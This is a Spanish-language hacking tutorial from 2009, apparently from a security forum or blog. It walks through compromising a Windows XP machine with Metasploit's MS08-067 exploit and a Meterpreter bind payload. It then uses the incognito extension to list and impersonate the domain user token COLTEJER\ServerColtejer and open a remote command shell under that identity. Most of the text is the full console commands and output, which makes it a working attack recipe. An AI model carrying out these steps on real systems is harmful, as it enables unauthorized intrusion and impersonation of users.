Suplantación de Usuarios
[Metasploit By: Shell Root]
Ahora veremos como suplantar a un usuario del sistema sin tener que crear un usuario nuevo con permisos de administrador.
Primero ingresaremos a la P.C con el exploit: * exploit/windows/smb/ms08_067_netapi
y con el PAYLOAD: * windows/vncinject/bind_tcp
En este caso usaremos el PAYLOAD
windows/shell/bind_tcp. No explicaré mucho porque para eso esta este POST de mi amigo Rcart.
http://foro.portalhacker.net/index.php/topic,93233.0.html
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7808 updated 16 days ago (2009.12.10)
Warning: This copy of the Metasploit Framework was last updated 16 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)
meterpreter > Despues de obtener el
Meterpreter, ejecutaremos el
use más la opción de
incognitometerpreter > use incognito
Loading extension incognito...success.
meterpreter >
Miramos que opciones tiene:
meterpreter > help
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter >
Usaremos el comando
list_tokens. Pero miremos que parametros tiene para la ejecución:
meterpreter > list_tokens
Usage: list_tokens <list_order_option>
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter >
Ahora mostraremos los usuarios existentes en el Sistema:
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
Ahora llega el momento en el que vamos a suplantar un usuario.
meterpreter > impersonate_token COLTEJER\\ServerColtejer
[+] Delegation token available
[+] Successfully impersonated user COLTEJER\ServerColtejer
meterpreter >
Abrimos la consola o shell remota del usuario suplantado. En este caso del usuario
COLTEJER\ServerColtejermeterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/suplantacion-de-usuarios.html
Video: http://www.youtube.com/watch?v=NHZlxMyim9s